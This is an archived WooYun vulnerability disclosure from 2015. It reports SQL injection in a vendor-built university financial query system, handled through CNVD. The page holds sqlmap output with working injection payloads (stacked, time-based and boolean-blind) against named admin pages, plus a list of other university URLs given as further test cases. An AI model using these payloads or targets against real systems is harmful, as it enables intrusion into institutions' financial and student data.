当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0109751

漏洞标题:某高校财务管理系统SQL注入

相关厂商:上海财大科技发展有限公司

漏洞作者: 大象

提交时间:2015-04-24 12:29

修复时间:2015-07-27 09:28

公开时间:2015-07-27 09:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-24: 细节已通知厂商并且等待厂商处理中
2015-04-28: 厂商已经确认,细节仅向厂商公开
2015-05-01: 细节向第三方安全合作伙伴开放
2015-06-22: 细节向核心白帽子及相关领域专家公开
2015-07-02: 细节向普通白帽子公开
2015-07-12: 细节向实习白帽子公开
2015-07-27: 细节向公众公开

简要描述:

RT

详细说明:

上海财大科技发展有限公司开发的财务信息查询系统。 http://www.shcdkf.com/
某些地方越权的同时还存在注入,越权别人提交过了,好像没人关注注入吧。
#1

http://www.shcdkf.com/cwc/KFweb/admin/StudentPassword.aspx


左上角的姓名搜索处存在注入

POST parameter 'txtXm' is vulnerable. Do you want to keep testing the others (if
any)? [y/N] n
sqlmap identified the following injection points with a total of 135 HTTP(s) req
uests:
---
Place: POST
Parameter: txtXm
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __VIEWSTATE=/wEPDwULLTEzOTc5NzEwNDIPZBYCAgMPZBYEAgQPEA8WBh4NRGF0YVR
leHRGaWVsZAUDQm1tHg5EYXRhVmFsdWVGaWVsZAUDQm1oHgtfIURhdGFCb3VuZGdkEBUVDOWFqOmDqOm
Zouezuy7mr5XkuJrmrKDotLnpg6jpl6ggICAgICAgICAgICAgICAgICAgICAgICAgICAgK+iLseaWh+e
zuyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAr5pel5rOV57O7ICAgICAgICAgICAgICA
gICAgICAgICAgICAgICAgICAgICvlm73mlL/ns7sgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA
gICAgK+Wbvee7j+ezuyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAu5paH5YyW5LiO5Ly
g5pKt57O7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICvnoJTnqbbnlJ8gICAgICAgICAgICAgICA
gICAgICAgICAgICAgICAgICAgKumrmOiBjCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA
gIC3kv6Hmga/np5HmioDns7sgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAr5rOV5b6L57O7ICA
gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC3lhazlhbHnrqHnkIbns7sgICAgICAgICAgICA
gICAgICAgICAgICAgICAgICAt6KGM5pS/566h55CG57O7ICAgICAgICAgICAgICAgICAgICAgICAgICA
gICAgLeS4lue7j++8iOeglO+8iSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC3lm73mlL/vvIj
noJTvvIkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAt5Zu95YWz77yI56CU77yJICAgICAgICA
gICAgICAgICAgICAgICAgICAgICAgLeiLseivre+8iOeglO+8iSAgICAgICAgICAgICAgICAgICAgICA
gICAgICAgIC3ml6Xor63vvIjnoJTvvIkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAt5rOV6K+
t77yI56CU77yJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLemAmuS/oe+8iOeglO+8iSAgICA
gICAgICAgICAgICAgICAgICAgICAgICAgIC3ljJblrabvvIjnoJTvvIkgICAgICAgICAgICAgICAgICA
gICAgICAgICAgICAVFQAIMDAwMCAgICAIMDAxICAgICAIMDAyICAgICAIMDAzICAgICAIMDA0ICAgICA
IMDA1ICAgICAIMDA2ICAgICAIMDA3ICAgICAIMDA4ICAgICAIMDA5ICAgICAIMDEwICAgICAIMDExICA
gICAIMDEyICAgICAIMDEzICAgICAIMDE0ICAgICAIMDE1ICAgICAIMDE2ICAgICAIMDE3ICAgICAIMDE
4ICAgICAIMDE5ICAgICAUKwMVZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZGQCBw88KwANAQAPFgQfAmceC18
hSXRlbUNvdW50ZmRkGAEFCUdyaWRWaWV3MQ88KwAKAQhmZIGzOebdIAYfkMXUMKOHqTKDCojC&__EVEN
TTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWGAK4zZukBAKD++r3AwK9xc+fCwKT/pLD
CALUuM/hCQKZnoKWBgLi2P7oCgKnvrKdBwLo+K7vCwKt3uHjAQL2mN71BALr/pO1CQKsu/CHDAKT/taS
BQLUuLPlCQKZnoaZBgLi2OLrCgKnvrZgAuj4kvILAq3e5eYBAvaYwvgEAuv+l7gJAqy79IoMAtGF4vgJ
N8kpcW/g0byM6DFBGf0DrpU9hS0=&txtXm=1'; WAITFOR DELAY '0:0:5'--&ddlDepart=&btFilt
er=%B9%FD%C2%CB&GridView1$ctl13$AspNetPager1_input=1
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __VIEWSTATE=/wEPDwULLTEzOTc5NzEwNDIPZBYCAgMPZBYEAgQPEA8WBh4NRGF0YVR
leHRGaWVsZAUDQm1tHg5EYXRhVmFsdWVGaWVsZAUDQm1oHgtfIURhdGFCb3VuZGdkEBUVDOWFqOmDqOm
Zouezuy7mr5XkuJrmrKDotLnpg6jpl6ggICAgICAgICAgICAgICAgICAgICAgICAgICAgK+iLseaWh+e
zuyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAr5pel5rOV57O7ICAgICAgICAgICAgICA
gICAgICAgICAgICAgICAgICAgICvlm73mlL/ns7sgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA
gICAgK+Wbvee7j+ezuyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAu5paH5YyW5LiO5Ly
g5pKt57O7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICvnoJTnqbbnlJ8gICAgICAgICAgICAgICA
gICAgICAgICAgICAgICAgICAgKumrmOiBjCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA
gIC3kv6Hmga/np5HmioDns7sgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAr5rOV5b6L57O7ICA
gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC3lhazlhbHnrqHnkIbns7sgICAgICAgICAgICA
gICAgICAgICAgICAgICAgICAt6KGM5pS/566h55CG57O7ICAgICAgICAgICAgICAgICAgICAgICAgICA
gICAgLeS4lue7j++8iOeglO+8iSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC3lm73mlL/vvIj
noJTvvIkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAt5Zu95YWz77yI56CU77yJICAgICAgICA
gICAgICAgICAgICAgICAgICAgICAgLeiLseivre+8iOeglO+8iSAgICAgICAgICAgICAgICAgICAgICA
gICAgICAgIC3ml6Xor63vvIjnoJTvvIkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAt5rOV6K+
t77yI56CU77yJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLemAmuS/oe+8iOeglO+8iSAgICA
gICAgICAgICAgICAgICAgICAgICAgICAgIC3ljJblrabvvIjnoJTvvIkgICAgICAgICAgICAgICAgICA
gICAgICAgICAgICAVFQAIMDAwMCAgICAIMDAxICAgICAIMDAyICAgICAIMDAzICAgICAIMDA0ICAgICA
IMDA1ICAgICAIMDA2ICAgICAIMDA3ICAgICAIMDA4ICAgICAIMDA5ICAgICAIMDEwICAgICAIMDExICA
gICAIMDEyICAgICAIMDEzICAgICAIMDE0ICAgICAIMDE1ICAgICAIMDE2ICAgICAIMDE3ICAgICAIMDE
4ICAgICAIMDE5ICAgICAUKwMVZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZGQCBw88KwANAQAPFgQfAmceC18
hSXRlbUNvdW50ZmRkGAEFCUdyaWRWaWV3MQ88KwAKAQhmZIGzOebdIAYfkMXUMKOHqTKDCojC&__EVEN
TTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWGAK4zZukBAKD++r3AwK9xc+fCwKT/pLD
CALUuM/hCQKZnoKWBgLi2P7oCgKnvrKdBwLo+K7vCwKt3uHjAQL2mN71BALr/pO1CQKsu/CHDAKT/taS
BQLUuLPlCQKZnoaZBgLi2OLrCgKnvrZgAuj4kvILAq3e5eYBAvaYwvgEAuv+l7gJAqy79IoMAtGF4vgJ
N8kpcW/g0byM6DFBGf0DrpU9hS0=&txtXm=1' WAITFOR DELAY '0:0:5'--&ddlDepart=&btFilte
r=%B9%FD%C2%CB&GridView1$ctl13$AspNetPager1_input=1
---
[19:37:02] [INFO] testing Microsoft SQL Server
[19:37:02] [WARNING] it is very important not to stress the network adapter duri
ng usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n] y
[19:37:11] [INFO] confirming Microsoft SQL Server
[19:37:17] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[19:37:17] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 21 times
[19:37:17] [INFO] fetched data logged to text files under 'C:\Users\sith\.sqlmap
\output\www.shcdkf.com'


#2

http://www.shcdkf.com/KfWeb/admin/UserManager.aspx


用户管理处
左上角的用户搜索也存在注入

POST parameter 'txtXm' is vulnerable. Do you want to keep testing the others (if
any)? [y/N] n
sqlmap identified the following injection points with a total of 57 HTTP(s) requ
ests:
---
Place: POST
Parameter: txtXm
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: __VIEWSTATE=/wEPDwUKMTA3MTk3NTE1NQ9kFgICAw9kFgYCBQ88KwANAQAPFgQeC18
hRGF0YUJvdW5kZx4LXyFJdGVtQ291bnQCAWQWAmYPZBYGAgEPZBYQZg9kFggCAQ8PFgQeBFRleHQFBuW
wgeWtmB4PQ29tbWFuZEFyZ3VtZW50BQoyMDA2MDMwMDAxZGQCAw8PFgYfAgUG5q2j5bi4HwMFCjIwMDY
wMzAwMDEeB0VuYWJsZWRoZGQCBQ8PFgIeDU9uQ2xpZW50Q2xpY2sFywF3aW5kb3cub3BlbignVXNlck1
hbmFnZXJQd2QuYXNweD9teXVzZXI9MjAwNjAzMDAwMScsJ215d2luZG93Jywnd2lkdGg9NDAwcHgsaGV
pZ2h0PTMwMHB4LHRvb2xiYXI9bm8sZGlyZWN0b3JpZXM9bm8sbG9jYXRpb249bm8sbWVudWJhcj1ubyx
zdGF0dXM9bm8sc2Nyb2xsYmFyPW5vLHJlc2l6YWJsZT1ubyxkaXJlY3Rvcmllcz0wJyk7cmV0dXJuIGZ
hbHNlO2RkAgcPDxYEHwUFPHJldHVybiBjb25maXJtKCfmuIXpmaTlkI7vvIzor6XkurrlkZjlj6/ku6X
ph43mlrDms6jlhozvvIEnKR8DBQoyMDA2MDMwMDAxZGQCAQ8PFgIfAgUKMjAwNjAzMDAwMWRkAgIPDxY
CHwIFCjIwMDYwMzAwMDFkZAIDDw8WAh8CBQnkuo7lkJHoi7FkZAIEDw8WAh8CBSPlrabmoKHlip7lhaz
lrqQgICAgICAgICAgICAgICAgICAgIGRkAgUPDxYCHwIFETIwMTUtMy01IDIxOjI1OjQzZGQCBg8PFgI
fAgURMjAxNS00LTE4IDg6NTI6MjlkZAIHDw8WAh8CBU48YSBocmVmPSdTaG93UGVyc29uUmlnaHRzLmF
zcHg/R2g9MjAwNjAzMDAwMScgdGFyZ2V0PSdfYmxhbmsnPuafpeivouadg+mZkDwvYT5kZAICDw8WAh4
HVmlzaWJsZWhkZAIDDw8WAh8GaGQWAmYPZBYCAgEPDxYEHgtSZWNvcmRjb3VudAIBHghQYWdlU2l6ZQI
PZGQCBw8PFgIfBQW6AXdpbmRvdy5vcGVuKCdBZGRSZWdpc3RlclVzZXIuYXNweCcsJ215d2luZG93Jyw
nd2lkdGg9NDAwcHgsaGVpZ2h0PTM1MHB4LHRvb2xiYXI9bm8sZGlyZWN0b3JpZXM9bm8sbG9jYXRpb24
9bm8sbWVudWJhcj1ubyxzdGF0dXM9bm8sc2Nyb2xsYmFyPW5vLHJlc2l6YWJsZT1ubyxkaXJlY3Rvcml
lcz0wJyk7cmV0dXJuIGZhbHNlO2RkAgkPDxYCHwUFtwF3aW5kb3cub3BlbignR2VuZXJhdGVVc2VyLmF
zcHgnLCdteXdpbmRvdycsJ3dpZHRoPTQwMHB4LGhlaWdodD0zNTBweCx0b29sYmFyPW5vLGRpcmVjdG9
yaWVzPW5vLGxvY2F0aW9uPW5vLG1lbnViYXI9bm8sc3RhdHVzPW5vLHNjcm9sbGJhcj1ubyxyZXNpemF
ibGU9bm8sZGlyZWN0b3JpZXM9MCcpO3JldHVybiBmYWxzZTtkZBgBBQlHcmlkVmlldzEPPCsACgEIAgF
kQ2lW1nkfhDL6199KEGgRKURAdJY=&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=
/wEWCQK26sH2AQKD++r3AwLRheL4CQLs0OGkDwLD2cqLDQKsp7mUDQL1xbPEAgKqp5XCAgLU8r71CRN4
XHRWPL11zk84BB+75MV0DscA&txtXm=2006030001' AND 3130=3130 AND 'Ojzn'='Ojzn&btFilt
er=%B9%FD%C2%CB&GridView1$ctl18$AspNetPager1_input=1
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: __VIEWSTATE=/wEPDwUKMTA3MTk3NTE1NQ9kFgICAw9kFgYCBQ88KwANAQAPFgQeC18
hRGF0YUJvdW5kZx4LXyFJdGVtQ291bnQCAWQWAmYPZBYGAgEPZBYQZg9kFggCAQ8PFgQeBFRleHQFBuW
wgeWtmB4PQ29tbWFuZEFyZ3VtZW50BQoyMDA2MDMwMDAxZGQCAw8PFgYfAgUG5q2j5bi4HwMFCjIwMDY
wMzAwMDEeB0VuYWJsZWRoZGQCBQ8PFgIeDU9uQ2xpZW50Q2xpY2sFywF3aW5kb3cub3BlbignVXNlck1
hbmFnZXJQd2QuYXNweD9teXVzZXI9MjAwNjAzMDAwMScsJ215d2luZG93Jywnd2lkdGg9NDAwcHgsaGV
pZ2h0PTMwMHB4LHRvb2xiYXI9bm8sZGlyZWN0b3JpZXM9bm8sbG9jYXRpb249bm8sbWVudWJhcj1ubyx
zdGF0dXM9bm8sc2Nyb2xsYmFyPW5vLHJlc2l6YWJsZT1ubyxkaXJlY3Rvcmllcz0wJyk7cmV0dXJuIGZ
hbHNlO2RkAgcPDxYEHwUFPHJldHVybiBjb25maXJtKCfmuIXpmaTlkI7vvIzor6XkurrlkZjlj6/ku6X
ph43mlrDms6jlhozvvIEnKR8DBQoyMDA2MDMwMDAxZGQCAQ8PFgIfAgUKMjAwNjAzMDAwMWRkAgIPDxY
CHwIFCjIwMDYwMzAwMDFkZAIDDw8WAh8CBQnkuo7lkJHoi7FkZAIEDw8WAh8CBSPlrabmoKHlip7lhaz
lrqQgICAgICAgICAgICAgICAgICAgIGRkAgUPDxYCHwIFETIwMTUtMy01IDIxOjI1OjQzZGQCBg8PFgI
fAgURMjAxNS00LTE4IDg6NTI6MjlkZAIHDw8WAh8CBU48YSBocmVmPSdTaG93UGVyc29uUmlnaHRzLmF
zcHg/R2g9MjAwNjAzMDAwMScgdGFyZ2V0PSdfYmxhbmsnPuafpeivouadg+mZkDwvYT5kZAICDw8WAh4
HVmlzaWJsZWhkZAIDDw8WAh8GaGQWAmYPZBYCAgEPDxYEHgtSZWNvcmRjb3VudAIBHghQYWdlU2l6ZQI
PZGQCBw8PFgIfBQW6AXdpbmRvdy5vcGVuKCdBZGRSZWdpc3RlclVzZXIuYXNweCcsJ215d2luZG93Jyw
nd2lkdGg9NDAwcHgsaGVpZ2h0PTM1MHB4LHRvb2xiYXI9bm8sZGlyZWN0b3JpZXM9bm8sbG9jYXRpb24
9bm8sbWVudWJhcj1ubyxzdGF0dXM9bm8sc2Nyb2xsYmFyPW5vLHJlc2l6YWJsZT1ubyxkaXJlY3Rvcml
lcz0wJyk7cmV0dXJuIGZhbHNlO2RkAgkPDxYCHwUFtwF3aW5kb3cub3BlbignR2VuZXJhdGVVc2VyLmF
zcHgnLCdteXdpbmRvdycsJ3dpZHRoPTQwMHB4LGhlaWdodD0zNTBweCx0b29sYmFyPW5vLGRpcmVjdG9
yaWVzPW5vLGxvY2F0aW9uPW5vLG1lbnViYXI9bm8sc3RhdHVzPW5vLHNjcm9sbGJhcj1ubyxyZXNpemF
ibGU9bm8sZGlyZWN0b3JpZXM9MCcpO3JldHVybiBmYWxzZTtkZBgBBQlHcmlkVmlldzEPPCsACgEIAgF
kQ2lW1nkfhDL6199KEGgRKURAdJY=&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=
/wEWCQK26sH2AQKD++r3AwLRheL4CQLs0OGkDwLD2cqLDQKsp7mUDQL1xbPEAgKqp5XCAgLU8r71CRN4
XHRWPL11zk84BB+75MV0DscA&txtXm=2006030001' AND 1435=(SELECT COUNT(*) FROM sysuse
rs AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,s
ysusers AS sys6,sysusers AS sys7) AND 'Uasz'='Uasz&btFilter=%B9%FD%C2%CB&GridVie
w1$ctl18$AspNetPager1_input=1
---
[19:44:16] [INFO] testing Microsoft SQL Server
[19:44:16] [INFO] confirming Microsoft SQL Server
[19:44:17] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000


temple.jpg


漏洞证明:

其他测试案例:

http://gzcx.tynu.edu.cn/cwc/KFweb/admin/UserManager.aspx
http://cycwc.gzife.edu.cn/kefa/admin/UserManager.aspx
http://59.72.128.44/KfWeb/admin/UserManager.aspx
http://www.cqvie.com/xfcxsq/admin/UserManager.aspx
http://cwch.ahu.edu.cn/querynetweb/admin/UserManager.aspx
http://gzcx.tynu.edu.cn/KfWeb/admin/UserManager.aspx
http://cwc.sxufe.edu.cn/KfWeb/admin/UserManager.aspx
http://221.5.51.228/cjb/admin/UserManager.aspx

修复方案:

版权声明:转载请注明来源 大象@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-04-28 09:26

厂商回复:

CNVD确认并复现所述情况,已经由CNVD通过网站公开联系方式(或以往建立的处置渠道)向网站管理单位(软件生产厂商)通报。

最新状态:

暂无